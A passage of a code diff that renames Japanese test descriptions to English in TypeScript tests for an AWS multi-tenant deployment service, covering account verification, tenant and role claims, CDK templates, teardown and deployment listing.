-  it("Issue #868: verified=false な row への rotate は CompetitorAccountNotVerifiedError を投げ SSM Put しないべき", async () => {
+  it("Issue #868: should throw CompetitorAccountNotVerifiedError without SSM Put when rotating a verified=false row", async () => {
     const { shared, ddbSend, ssmSend } = buildShared();
     // verified=false な row
     ddbSend.mockResolvedValueOnce({

--- a/infrastructure/test/problem-deploy/competitor-accounts-verify.test.ts
+++ b/infrastructure/test/problem-deploy/competitor-accounts-verify.test.ts
@@ -33,7 +33,7 @@ function buildShared(): {
 describe("verifyCompetitorAccount", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("STS AssumeRole を ExternalId 付きで発行し、成功時に verified=true を立てるべき", async () => {
+  it("should issue STS AssumeRole with ExternalId and set verified=true on success", async () => {
     const { shared, ddbSend, ssmSend, stsSend } = buildShared();
     // 1. DDB.Get で row 取得
     ddbSend.mockResolvedValueOnce({
@@ -84,7 +84,7 @@ describe("verifyCompetitorAccount", () => {
     expect(out.verifiedAt).toBeTruthy();
   });
 
-  it("row が無ければ CompetitorAccountNotFoundError を投げるべき", async () => {
+  it("should throw CompetitorAccountNotFoundError when the row is missing", async () => {
     const { shared, ddbSend, ssmSend, stsSend } = buildShared();
     // DDB Get + SSM GetParameter は Promise.all で並列発火されるので両方 mock 必要
     ddbSend.mockResolvedValueOnce({}); // not found
@@ -102,7 +102,7 @@ describe("verifyCompetitorAccount", () => {
     expect(stsSend.mock.calls.length).toBe(0);
   });
 
-  it("SSM に ExternalId が無ければ ExternalIdMissingError を投げ STS を呼ばないべき", async () => {
+  it("should throw ExternalIdMissingError without calling STS when ExternalId is missing in SSM", async () => {
     const { shared, ddbSend, ssmSend, stsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Item: {
@@ -127,7 +127,7 @@ describe("verifyCompetitorAccount", () => {
     expect(stsSend.mock.calls.length).toBe(0);
   });
 
-  it("STS AssumeRole 失敗時は AssumeRoleSanityCheckFailedError に変換するべき (= operator に AccessDenied を見せる)", async () => {
+  it("should convert STS AssumeRole failure to AssumeRoleSanityCheckFailedError (show AccessDenied to operator)", async () => {
     const { shared, ddbSend, ssmSend, stsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Item: {
@@ -158,7 +158,7 @@ describe("verifyCompetitorAccount", () => {
     expect(ddbSend.mock.calls.length).toBe(1);
   });
 
-  it("#856: AssumeRole が AccessDenied + version > 1 のとき 1 generation 前の ExternalId で retry して成功すべき (rotate race grace)", async () => {
+  it("#856: should retry with the previous-generation ExternalId on AccessDenied when version > 1 (rotate race grace)", async () => {
     const { shared, ddbSend, ssmSend, stsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Item: {
@@ -203,7 +203,7 @@ describe("verifyCompetitorAccount", () => {
     expect(secondStsCmd.input.ExternalId).toBe("external-id-old");
   });
 
-  it("#856: version=1 のときは fallback せず即失敗するべき (= rotate 未経験 / Trust Policy 真の不整合)", async () => {
+  it("#856: should fail immediately without fallback when version=1 (= no rotation yet / real Trust Policy mismatch)", async () => {
     const { shared, ddbSend, ssmSend, stsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Item: {

--- a/infrastructure/test/problem-deploy/deploy-auth.test.ts
+++ b/infrastructure/test/problem-deploy/deploy-auth.test.ts
@@ -18,7 +18,7 @@ import {
 } from "../../lib/problem-deploy/handlers/deploy-handler/auth";
 
 describe("extractTenantIdFromClaims", () => {
-  it("custom:tenantId が文字列なら返すべき", () => {
+  it("should return custom:tenantId when it is a string", () => {
     expect(extractTenantIdFromClaims({ "custom:tenantId": "tenant-acme" })).toBe("tenant-acme");
   });
 
@@ -41,7 +41,7 @@ describe("extractTenantIdFromClaims", () => {
     expect(extractTenantIdFromClaims({ sub: "u-1" })).toBeUndefined();
   });
 
-  it("trim して返すべき (Cognito の trailing space 揺れ対策)", () => {
+  it("should trim and return (guard against Cognito trailing-space drift)", () => {
     expect(extractTenantIdFromClaims({ "custom:tenantId": "  tenant-acme  " })).toBe("tenant-acme");
   });
 });
@@ -63,19 +63,19 @@ describe("resolveTenantId", () => {
     else process.env.DEFAULT_TENANT_ID = original;
   });
 
-  it("JWT claim が居れば優先するべき", () => {
+  it("should prefer the JWT claim when present", () => {
     process.env.DEFAULT_TENANT_ID = "tenant-from-env";
     const c = buildCtx({ "custom:tenantId": "tenant-from-jwt" });
     expect(resolveTenantId(c)).toBe("tenant-from-jwt");
   });
 
-  it("JWT claim が無ければ DEFAULT_TENANT_ID env を返すべき", () => {
+  it("should fall back to DEFAULT_TENANT_ID env when JWT claim is missing", () => {
     process.env.DEFAULT_TENANT_ID = "tenant-from-env";
     const c = buildCtx();
     expect(resolveTenantId(c)).toBe("tenant-from-env");
   });
 
-  it("env も無ければ MissingTenantClaimError を throw すべき (= Issue #843 fail-closed)", () => {
+  it("should throw MissingTenantClaimError when env is also missing (Issue #843 fail-closed)", () => {
     delete process.env.DEFAULT_TENANT_ID;
     const c = buildCtx();
     expect(() => resolveTenantId(c)).toThrow(MissingTenantClaimError);
@@ -91,7 +91,7 @@ describe("resolveTenantId", () => {
 /* ---- Issue #854: TenantAdmin role enforcement ---- */
 
 describe("extractUserRoleFromClaims (Issue #854)", () => {
-  it("custom:userRole が文字列なら trim して返すべき", () => {
+  it("should return custom:userRole trimmed when it is a string", () => {
     expect(extractUserRoleFromClaims({ "custom:userRole": "TenantAdmin" })).toBe("TenantAdmin");
     expect(extractUserRoleFromClaims({ "custom:userRole": "  TenantAdmin  " })).toBe("TenantAdmin");
   });
@@ -111,18 +111,18 @@ describe("resolveUserRole (Issue #854)", () => {
     else process.env.DEFAULT_USER_ROLE = original;
   });
 
-  it("JWT claim が居れば優先するべき", () => {
+  it("should prefer the JWT claim when present", () => {
     process.env.DEFAULT_USER_ROLE = "from-env";
     const c = buildCtx({ "custom:userRole": "TenantAdmin" });
     expect(resolveUserRole(c)).toBe("TenantAdmin");
   });
 
-  it("JWT claim が無ければ DEFAULT_USER_ROLE env を返すべき", () => {
+  it("should fall back to DEFAULT_USER_ROLE env when JWT claim is missing", () => {
     process.env.DEFAULT_USER_ROLE = "TenantAdmin";
     expect(resolveUserRole(buildCtx())).toBe("TenantAdmin");
   });
 
-  it("env も無ければ undefined を返すべき", () => {
+  it("should return undefined when env is also missing", () => {
     delete process.env.DEFAULT_USER_ROLE;
     expect(resolveUserRole(buildCtx())).toBeUndefined();
   });
@@ -189,12 +189,12 @@ function buildRestCtx(claims?: Record<string, string>): Context {
 }
 
 describe("extractClaims (REST API vs HTTP API authorizer 形式)", () => {
-  it("HTTP API V2 形式 (= authorizer.jwt.claims) を読むべき", () => {
+  it("should read HTTP API V2 form (authorizer.jwt.claims)", () => {
     const c = buildCtx({ "custom:tenantId": "tenant-http-api" });
     expect(extractClaims(c)).toEqual({ "custom:tenantId": "tenant-http-api" });
   });
 
-  it("REST API + Cognito 形式 (= authorizer.claims、 .jwt. wrap 無し) を読むべき", () => {
+  it("should read the REST API + Cognito form (authorizer.claims, no .jwt. wrap)", () => {
     const c = buildRestCtx({ "custom:tenantId": "tenant-rest-api" });
     expect(extractClaims(c)).toEqual({ "custom:tenantId": "tenant-rest-api" });
   });
@@ -208,11 +208,11 @@ describe("extractClaims (REST API vs HTTP API authorizer 形式)", () => {
 /* ---- ADR-020 / Issue #926 Phase B: role enum + requireRole ---- */
 
 describe("TENANT_ROLES enum (ADR-020)", () => {
-  it("3 role を持つべき (Admin / Operator / Viewer)", () => {
+  it("should have 3 roles (Admin / Operator / Viewer)", () => {
     expect(TENANT_ROLES).toEqual(["TenantAdmin", "TenantOperator", "TenantViewer"]);
   });
 
-  it("const exports は role 文字列と一致するべき", () => {
+  it("const exports should match the role strings", () => {
     expect(TENANT_ADMIN_ROLE).toBe("TenantAdmin");
     expect(TENANT_OPERATOR_ROLE).toBe("TenantOperator");
     expect(TENANT_VIEWER_ROLE).toBe("TenantViewer");
@@ -270,7 +270,7 @@ describe("requireTenantAdmin alias (= requireRole(c, [TENANT_ADMIN_ROLE]))", () 
     else process.env.DEFAULT_USER_ROLE = original;
   });
 
-  it("TenantOperator は requireTenantAdmin で reject されるべき (= Phase B alias が degrade しない)", () => {
+  it("TenantOperator should be rejected by requireTenantAdmin (Phase B alias does not degrade)", () => {
     delete process.env.DEFAULT_USER_ROLE;
     const c = buildCtx({ "custom:userRole": "TenantOperator" });
     expect(() => requireTenantAdmin(c)).toThrow(ForbiddenRoleError);
@@ -293,20 +293,20 @@ describe("resolveTenantId / resolveUserRole / resolveCognitoSub (REST API path)"
     else process.env.DEFAULT_USER_ROLE = originalRole;
   });
 
-  it("REST API claim path から tenantId を resolve するべき", () => {
+  it("should resolve tenantId from the REST API claim path", () => {
     delete process.env.DEFAULT_TENANT_ID;
     const c = buildRestCtx({ "custom:tenantId": "tenant-rest-api" });
     expect(resolveTenantId(c)).toBe("tenant-rest-api");
   });
 
-  it("REST API claim path から userRole を resolve するべき (Issue #903 forbidden_role 修正)", () => {
+  it("should resolve userRole from the REST API claim path (Issue #903 forbidden_role fix)", () => {
     delete process.env.DEFAULT_USER_ROLE;
     const c = buildRestCtx({ "custom:userRole": "TenantAdmin" });
     expect(resolveUserRole(c)).toBe("TenantAdmin");
     expect(() => requireTenantAdmin(c)).not.toThrow();
   });
 
-  it("REST API claim path から Cognito sub を resolve するべき", () => {
+  it("should resolve Cognito sub from the REST API claim path", () => {
     const c = buildRestCtx({ sub: "user-rest-api" });
     expect(resolveCognitoSub(c)).toBe("user-rest-api");
   });

--- a/infrastructure/test/problem-deploy/deploy-codebuild-project.test.ts
+++ b/infrastructure/test/problem-deploy/deploy-codebuild-project.test.ts
@@ -31,7 +31,7 @@ function synth(props?: { concurrentBuildLimit?: number }): Template {
 }
 
 describe("DeployCodeBuildProject — concurrent build limit (#538)", () => {
-  it("`concurrentBuildLimit` を未指定なら ConcurrentBuildLimit プロパティを設定しないべき", () => {
+  it("should omit the ConcurrentBuildLimit property when `concurrentBuildLimit` is unset", () => {
     // 未指定 = AWS account 全体の concurrent build limit (default 60) をフルに使う。
     // この既定挙動を変えないことが本 PR の前提 (= 既存運用への regression を出さない)。
     const tpl = synth();
@@ -42,7 +42,7 @@ describe("DeployCodeBuildProject — concurrent build limit (#538)", () => {
     expect(project?.Properties?.ConcurrentBuildLimit).toBeUndefined();
   });
 
-  it("`concurrentBuildLimit: 200` を渡したら CFn の ConcurrentBuildLimit に反映されるべき", () => {
+  it("should reflect `concurrentBuildLimit: 200` in CFn ConcurrentBuildLimit", () => {
     // Service Quota request で account を 200 に上げた operator が、本 project に明示的に
     // cap を伝える経路。CDK Project は `concurrentBuildLimit` を ConcurrentBuildLimit
     // CFn property にそのまま渡す。
@@ -53,7 +53,7 @@ describe("DeployCodeBuildProject — concurrent build limit (#538)", () => {
     );
   });
 
-  it("`concurrentBuildLimit: 60` (= AWS account default) を渡しても CFn property に反映されるべき", () => {
+  it("should reflect `concurrentBuildLimit: 60` (= AWS account default) in the CFn property", () => {
     // 60 は AWS 既定の hard cap と同値。明示的に 60 を設定して「project がこの cap を
     // 越えない」ことを宣言的にしたい運用 (= dev 環境のコスト暴走防止) に使う。
     const tpl = synth({ concurrentBuildLimit: 60 });
@@ -65,7 +65,7 @@ describe("DeployCodeBuildProject — concurrent build limit (#538)", () => {
 });
 
 describe("DeployCodeBuildProject — Phase 2.2 cross-account perms (Issue #459)", () => {
-  it("CodeBuild Project Role に sts:AssumeRole (`arn:aws:iam::*:role/TenkaCloud-*`) を付与するべき", () => {
+  it("should grant sts:AssumeRole (`arn:aws:iam::*:role/TenkaCloud-*`) to the CodeBuild Project Role", () => {
     const tpl = synth();
     // Project Role の inline policy に AssumeRole を含む statement が出るべき。
     tpl.hasResourceProperties(
@@ -84,7 +84,7 @@ describe("DeployCodeBuildProject — Phase 2.2 cross-account perms (Issue #459)"
     );
   });
 
-  it("CodeBuild Project Role に SSM SecureString Read (= tenant path prefix scope) を付与するべき", () => {
+  it("should grant SSM SecureString Read (tenant path prefix scope) to the CodeBuild Project Role", () => {
     const tpl = synth();
     tpl.hasResourceProperties(
       "AWS::IAM::Policy",
@@ -103,7 +103,7 @@ describe("DeployCodeBuildProject — Phase 2.2 cross-account perms (Issue #459)"
     );
   });
 
-  it("CodeBuild env variables に AssumeRole と per-deployment ExternalId 用の env を宣言するべき", () => {
+  it("should declare AssumeRole and per-deployment ExternalId env vars in the CodeBuild env", () => {
     const tpl = synth();
     tpl.hasResourceProperties(
       "AWS::CodeBuild::Project",

--- a/infrastructure/test/problem-deploy/deploy-create-state-machine.test.ts
+++ b/infrastructure/test/problem-deploy/deploy-create-state-machine.test.ts
@@ -48,7 +48,7 @@ function buildTestStack(): { stack: cdk.Stack; template: Template } {
 }
 
 describe("DeployCreateStateMachine DescribeStack task (#809 regression)", () => {
-  it("DescribeStack task の Parameters は object であり、 literal string ではないべき", () => {
+  it("DescribeStack task Parameters should be an object, not a literal string", () => {
     const { template } = buildTestStack();
     const stateMachines = template.findResources("AWS::StepFunctions::StateMachine");
     const sm = Object.values(stateMachines)[0];
@@ -76,7 +76,7 @@ describe("DeployCreateStateMachine DescribeStack task (#809 regression)", () => 
     expect(asJson).toContain('"detail.$":"$.detail"');
   });
 
-  it("DescribeStack task は payloadResponseOnly=true 維持で resultPath が $.cfn であるべき", () => {
+  it("DescribeStack task should keep payloadResponseOnly=true with resultPath $.cfn", () => {
     const { template } = buildTestStack();
     const stateMachines = template.findResources("AWS::StepFunctions::StateMachine");
     const sm = Object.values(stateMachines)[0];
@@ -93,7 +93,7 @@ describe("DeployCreateStateMachine DescribeStack task (#809 regression)", () => 
     expect(asJson).toContain('"ResultPath":"$.cfn"');
   });
 
-  it("StateMachine 全体が synth 可能で IAM policy で Lambda invoke が許可されるべき", () => {
+  it("the whole StateMachine should synth and the IAM policy should allow Lambda invoke", () => {
     const { template } = buildTestStack();
     template.resourceCountIs("AWS::StepFunctions::StateMachine", 1);
     // State Machine の execution role policy が Lambda invoke を含むこと
@@ -114,7 +114,7 @@ describe("DeployCreateStateMachine DescribeStack task (#809 regression)", () => 
   // Issue #895 Phase 2.A: ADR-001 §6 の stack tagging に必要な tenantId / jobId を
   // CodeBuild env に渡す経路の regression test。 これらが欠けると deploy-battles.sh が
   // tag 値を \"unknown\" にして CFn → tenant 逆引きが効かなくなる。
-  it("Issue #895: CodeBuild env に TENKACLOUD_TENANT_ID / TENKACLOUD_JOB_ID が渡されるべき", () => {
+  it("Issue #895: should pass TENKACLOUD_TENANT_ID / TENKACLOUD_JOB_ID into CodeBuild env", () => {
     const { template } = buildTestStack();
     const stateMachines = template.findResources("AWS::StepFunctions::StateMachine");
     const sm = Object.values(stateMachines)[0];

--- a/infrastructure/test/problem-deploy/deploy-delete.test.ts
+++ b/infrastructure/test/problem-deploy/deploy-delete.test.ts
@@ -67,7 +67,7 @@ const sampleRow = (over: Record<string, unknown> = {}) => ({
 describe("requestTeardown", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("正常系: status を DELETING に書き換えて DeployDeleteRequested を publish するべき", async () => {
+  it("normal case: should rewrite status to DELETING and publish DeployDeleteRequested", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleRow() });
     ddbSend.mockResolvedValueOnce({});
@@ -101,7 +101,7 @@ describe("requestTeardown", () => {
     });
   });
 
-  it("stackId (ARN) があれば namePrefix ではなく ARN を stackName として publish するべき", async () => {
+  it("should publish the ARN as stackName instead of namePrefix when stackId (ARN) is present", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Item: sampleRow({
@@ -123,7 +123,7 @@ describe("requestTeardown", () => {
     );
   });
 
-  it("行が無ければ not_found を返し Update / PutEvents を呼ばないべき", async () => {
+  it("should return not_found without calling Update / PutEvents when the row is missing", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: undefined });
 
@@ -133,7 +133,7 @@ describe("requestTeardown", () => {
     expect(eventsSend).not.toHaveBeenCalled();
   });
 
-  it("tenantId 不一致は not_found 扱いで存在を漏らさないべき", async () => {
+  it("should treat tenantId mismatch as not_found and not leak existence", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleRow({ tenantId: "tenant-other" }) });
 
@@ -142,7 +142,7 @@ describe("requestTeardown", () => {
     expect(eventsSend).not.toHaveBeenCalled();
   });
 
-  it("既に DELETING / DELETED なら already_deleted を返すべき (no-op)", async () => {
+  it("should return already_deleted when already DELETING / DELETED (no-op)", async () => {
     for (const status of ["DELETING", "DELETED"]) {
       const { shared, ddbSend, eventsSend } = buildShared();
       ddbSend.mockResolvedValueOnce({ Item: sampleRow({ status }) });
@@ -154,7 +154,7 @@ describe("requestTeardown", () => {
     }
   });
 
-  it("ConditionalCheckFailed は race として返すべき (並行 update に負けたケース)", async () => {
+  it("should return race on ConditionalCheckFailed (lost concurrent update)", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleRow() });
     ddbSend.mockImplementationOnce(async (cmd) => {
@@ -171,7 +171,7 @@ describe("requestTeardown", () => {
     expect(eventsSend).not.toHaveBeenCalled();
   });
 
-  it("region / awsAccountId / stackName が欠けていれば missing_required_fields を欠損 fields 付きで返すべき", async () => {
+  it("should return missing_required_fields with the missing fields when region / awsAccountId / stackName are absent", async () => {
     // race (= 並行 update に負けた) と区別する: corruption (DDB データ欠損) は
     // operator が watch する別の運用シグナルなので別 reason として返す。
     const { shared, ddbSend, eventsSend } = buildShared();
@@ -193,7 +193,7 @@ describe("requestTeardown", () => {
     expect(eventsSend).not.toHaveBeenCalled();
   });
 
-  it("publishProblemEvent が失敗したら status を FAILED に compensating update して例外を伝播するべき", async () => {
+  it("should compensating-update status to FAILED and propagate the exception when publishProblemEvent fails", async () => {
     // DELETING のまま放置すると、次の呼び出しが already_deleted で no-op を返し
     // CFn stack が orphan 化するため、publish 失敗時は status を巻き戻す。
     const { shared, ddbSend, eventsSend } = buildShared();
@@ -220,7 +220,7 @@ describe("requestTeardown", () => {
     );
   });
 
-  it("最初の GetItem は PK=DEPLOYMENT#<jobId> SK=META を引くべき", async () => {
+  it("the first GetItem should hit PK=DEPLOYMENT#<jobId> SK=META", async () => {
     const { shared, ddbSend, eventsSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleRow({ jobId: "JOB42" }) });
     ddbSend.mockResolvedValueOnce({});

--- a/infrastructure/test/problem-deploy/deploy-handler-routes.test.ts
+++ b/infrastructure/test/problem-deploy/deploy-handler-routes.test.ts
@@ -75,7 +75,7 @@ const VALID_DEPLOY_BODY = {
 describe("POST /problems/:problemId/deploy", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("Phase 2.2: UnverifiedCompetitorAccountError は 422 + awsAccountId を返すべき", async () => {
+  it("Phase 2.2: should return 422 + awsAccountId on UnverifiedCompetitorAccountError", async () => {
     mocks.startDeployment.mockRejectedValueOnce(
       new UnverifiedCompetitorAccountError("123456789012"),
     );
@@ -94,7 +94,7 @@ describe("POST /problems/:problemId/deploy", () => {
 describe("GET /problems/:problemId/deployments", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("正常系: 200 と items を返すべき", async () => {
+  it("normal case: should return 200 with items", async () => {
     mocks.listDeployments.mockResolvedValueOnce({
       items: [{ jobId: "JOB1", status: "IN_PROGRESS" }],
       nextCursor: "abc",
@@ -117,7 +117,7 @@ describe("GET /problems/:problemId/deployments", () => {
     expect(res.status).toBe(400);
   });
 
-  it("limit / cursor を listDeployments に渡すべき", async () => {
+  it("should pass limit / cursor through to listDeployments", async () => {
     mocks.listDeployments.mockResolvedValueOnce({ items: [], nextCursor: undefined });
     await app.request("/problems/security-battle-royale/deployments?limit=10&cursor=xyz");
     expect(mocks.listDeployments).toHaveBeenCalledWith(
@@ -138,7 +138,7 @@ describe("GET /problems/:problemId/deployments", () => {
 describe("GET /deployments/:jobId", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("正常系: 200 と item を返すべき", async () => {
+  it("normal case: should return 200 with item", async () => {
     mocks.getDeployment.mockResolvedValueOnce({ jobId: ULID, status: "COMPLETE" });
     const res = await app.request(`/deployments/${ULID}`);
     expect(res.status).toBe(200);
@@ -168,7 +168,7 @@ describe("GET /deployments/:jobId", () => {
 describe("DELETE /deployments/:jobId", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("正常系: 202 と previousStatus を返すべき", async () => {
+  it("normal case: should return 202 with previousStatus", async () => {
     mocks.requestTeardown.mockResolvedValueOnce({
       kind: "accepted",
       previousStatus: "IN_PROGRESS",
@@ -219,7 +219,7 @@ describe("DELETE /deployments/:jobId", () => {
 describe("GET /deployments/:jobId/stack-progress", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("正常系: 200 と progress を返すべき", async () => {
+  it("normal case: should return 200 with progress", async () => {
     mocks.getStackProgress.mockResolvedValueOnce({
       kind: "ok",
       progress: {
@@ -251,7 +251,7 @@ describe("GET /deployments/:jobId/stack-progress", () => {
     expect(res.status).toBe(404);
   });
 
-  it("stack 未割当 (deploy 極初期) は 409 を返すべき", async () => {
+  it("should return 409 when no stack is assigned yet (very early deploy)", async () => {
     mocks.getStackProgress.mockResolvedValueOnce({ kind: "stack_not_yet_created" });
     const res = await app.request(`/deployments/${ULID}/stack-progress`);
     expect(res.status).toBe(409);
@@ -259,7 +259,7 @@ describe("GET /deployments/:jobId/stack-progress", () => {
     expect(body.error).toBe("stack_not_yet_created");
   });
 
-  it("CFn 上で stack 未在は 200 + consoleUrl のみ返すべき", async () => {
+  it("should return only 200 + consoleUrl when the stack is missing on CFn", async () => {
     mocks.getStackProgress.mockResolvedValueOnce({
       kind: "stack_not_found_in_cfn",
       consoleUrl: "https://example.com/cfn",

--- a/infrastructure/test/problem-deploy/deploy-handler.test.ts
+++ b/infrastructure/test/problem-deploy/deploy-handler.test.ts
@@ -84,7 +84,7 @@ const sampleRequest = (overrides: Partial<DeployInvocation> = {}): DeployInvocat
 describe("startDeployment", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("DDB に PutItem を 1 回 送るべき", async () => {
+  it("should send a single PutItem to DDB", async () => {
     const { ctx, putSend } = buildContext();
     await startDeployment(ctx, sampleRequest());
     expect(putSend).toHaveBeenCalledOnce();
@@ -103,7 +103,7 @@ describe("startDeployment", () => {
     );
   });
 
-  it("GSI2PK = TEAMKEY#<teamLoginKey> を sparse index 用に書き込むべき", async () => {
+  it("should write GSI2PK = TEAMKEY#<teamLoginKey> for the sparse index", async () => {
     const { ctx, putSend } = buildContext();
     await startDeployment(ctx, sampleRequest());
     const cmd = putSend.mock.calls[0]?.[0] as PutCommand;
@@ -113,7 +113,7 @@ describe("startDeployment", () => {
     expect(item?.GSI2SK).toBe(item?.GSI1SK);
   });
 
-  it("EventBridge に DeployCreateRequested イベントを送るべき", async () => {
+  it("should send a DeployCreateRequested event to EventBridge", async () => {
     const { ctx, eventsSend } = buildContext();
     await startDeployment(ctx, sampleRequest());
     expect(eventsSend).toHaveBeenCalledOnce();
@@ -129,7 +129,7 @@ describe("startDeployment", () => {
     expect(detail.namePrefix).toBe("tc-security-battle-royale-alpha-team");
   });
 
-  it("response に jobId / status / namePrefix / teamLoginKey / expiresAt を返すべき", async () => {
+  it("should return jobId / status / namePrefix / teamLoginKey / expiresAt in the response", async () => {
     const { ctx } = buildContext();
     const res = await startDeployment(ctx, sampleRequest());
     expect(res.jobId).toMatch(/^[0-9A-HJKMNP-TV-Z]{26}$/); // ULID
@@ -139,7 +139,7 @@ describe("startDeployment", () => {
     expect(res.expiresAt).toBe(Math.floor((1_700_000_000_000 + 60_000) / 1000));
   });
 
-  it("生成される jobId は呼び出しごとに異なるべき", async () => {
+  it("generated jobIds should differ on each call", async () => {
     const { ctx } = buildContext();
     const a = await startDeployment(ctx, sampleRequest());
     const b = await startDeployment(ctx, sampleRequest());
@@ -147,14 +147,14 @@ describe("startDeployment", () => {
     expect(a.teamLoginKey).not.toBe(b.teamLoginKey);
   });
 
-  it("DDB Put が失敗したら EventBridge を呼ばずに throw するべき", async () => {
+  it("should throw without calling EventBridge when DDB Put fails", async () => {
     const { ctx, putSend, eventsSend } = buildContext();
     putSend.mockRejectedValueOnce(new Error("DDB down"));
     await expect(startDeployment(ctx, sampleRequest())).rejects.toThrow("DDB down");
     expect(eventsSend).not.toHaveBeenCalled();
   });
 
-  it("EventBridge publish が失敗したら deployment を FAILED に補償更新すべき", async () => {
+  it("should compensate by updating the deployment to FAILED when EventBridge publish fails", async () => {
     const { ctx, putSend, eventsSend } = buildContext();
     eventsSend.mockResolvedValueOnce({
       FailedEntryCount: 1,
@@ -181,7 +181,7 @@ describe("startDeployment", () => {
     expect(updateCmd?.input.ExpressionAttributeValues?.[":tenantId"]).toBeDefined();
   });
 
-  it("forward-compat フィールド (accountGroupId / problemSetId) も保存するべき", async () => {
+  it("should also persist forward-compat fields (accountGroupId / problemSetId)", async () => {
     const { ctx, putSend } = buildContext();
     await startDeployment(ctx, sampleRequest({ accountGroupId: "group-1", problemSetId: "set-1" }));
     const cmd = putSend.mock.calls[0]?.[0] as PutCommand;
@@ -198,7 +198,7 @@ describe("startDeployment", () => {
   });
 
   // Phase 2.2 (Issue #459): verified=true 行が無いと UnverifiedCompetitorAccountError を投げるべき
-  it("CompetitorAccounts に verified=true 行が無い awsAccountId は reject (Unverified… throw) するべき", async () => {
+  it("should reject awsAccountId without a verified=true CompetitorAccounts row (throw Unverified…)", async () => {
     const { ctx, putSend, eventsSend } = buildContext({}, { unverified: true });
     await expect(startDeployment(ctx, sampleRequest())).rejects.toBeInstanceOf(
       UnverifiedCompetitorAccountError,
@@ -208,7 +208,7 @@ describe("startDeployment", () => {
   });
 
   // Phase 2.2: DeployCreateRequested detail に competitorRoleArn / externalIdParameterName を含めるべき
-  it("DeployCreateRequested detail に AssumeRole 用 competitorRoleArn / externalIdParameterName を詰めるべき", async () => {
+  it("should pack competitorRoleArn / externalIdParameterName for AssumeRole into DeployCreateRequested detail", async () => {
     const { ctx, eventsSend } = buildContext();
     await startDeployment(ctx, sampleRequest());
     const cmd = eventsSend.mock.calls[0]?.[0] as PutEventsCommand;
@@ -242,7 +242,7 @@ describe("startDeployment", () => {
       expect(detail.challengePayloadUrl).toBeUndefined();
     });
 
-    it("private 問題 + bucket 設定 + S3 client があれば presigned URL を detail に詰めるべき", async () => {
+    it("should pack a presigned URL into detail when a private problem has a bucket configured and an S3 client", async () => {
       const { ctx, eventsSend } = buildContext({
         problemsVisibility: { "security-battle-royale": "private" },
         challengePayloadBucket: "tc-challenges-test",
@@ -268,7 +268,7 @@ describe("startDeployment", () => {
       expect(detail.challengePayloadUrl).toBeUndefined();
     });
 
-    it("private 問題 + bucket あり + s3 client 未注入なら error を throw すべき", async () => {
+    it("should throw an error for private problems with a bucket but no s3 client injected", async () => {
       const { ctx } = buildContext({
         problemsVisibility: { "security-battle-royale": "private" },
         challengePayloadBucket: "tc-challenges-test",

--- a/infrastructure/test/problem-deploy/deploy-list.test.ts
+++ b/infrastructure/test/problem-deploy/deploy-list.test.ts
@@ -52,7 +52,7 @@ describe("toSummary", () => {
     expect(JSON.stringify(s)).not.toContain("SECRET_LOGIN_KEY_DO_NOT_LEAK");
   });
 
-  it("公開フィールドはそのまま入るべき", () => {
+  it("public fields should be included as-is", () => {
     const s = toSummary(sampleRow());
     expect(s.jobId).toBe("01HABC");
     expect(s.problemId).toBe("security-battle-royale");
@@ -65,7 +65,7 @@ describe("toSummary", () => {
 describe("listDeployments", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("GSI1 に対して TENANT#<id> で Query を投げるべき", async () => {
+  it("should issue a Query against GSI1 with TENANT#<id>", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [sampleRow()], LastEvaluatedKey: undefined });
 
@@ -80,7 +80,7 @@ describe("listDeployments", () => {
     expect(cmd.input.ScanIndexForward).toBe(false);
   });
 
-  it("teamLoginKey を返り値に出さないべき (DDB の row には含まれていても)", async () => {
+  it("should not surface teamLoginKey in the return value (even if present in the DDB row)", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [sampleRow()], LastEvaluatedKey: undefined });
 
@@ -89,7 +89,7 @@ describe("listDeployments", () => {
     expect(JSON.stringify(out.items[0])).not.toContain("SECRET_LOGIN_KEY_DO_NOT_LEAK");
   });
 
-  it("problemId が指定されたら filter するべき", async () => {
+  it("should filter when problemId is specified", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Items: [
@@ -106,7 +106,7 @@ describe("listDeployments", () => {
     expect(out.items.map((i) => i.jobId)).toEqual(["JOB1"]);
   });
 
-  it("LastEvaluatedKey を base64url cursor で返すべき", async () => {
+  it("should return LastEvaluatedKey as a base64url cursor", async () => {
     const { shared, ddbSend } = buildShared();
     const lastKey = { PK: "DEPLOYMENT#X", SK: "META" };
     ddbSend.mockResolvedValueOnce({ Items: [], LastEvaluatedKey: lastKey });
@@ -117,7 +117,7 @@ describe("listDeployments", () => {
     expect(decoded).toEqual(lastKey);
   });
 
-  it("cursor を渡すと ExclusiveStartKey として渡されるべき", async () => {
+  it("should forward the cursor as ExclusiveStartKey", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [], LastEvaluatedKey: undefined });
     const startKey = { PK: "DEPLOYMENT#Y", SK: "META" };
@@ -129,7 +129,7 @@ describe("listDeployments", () => {
     expect(cmd.input.ExclusiveStartKey).toEqual(startKey);
   });
 
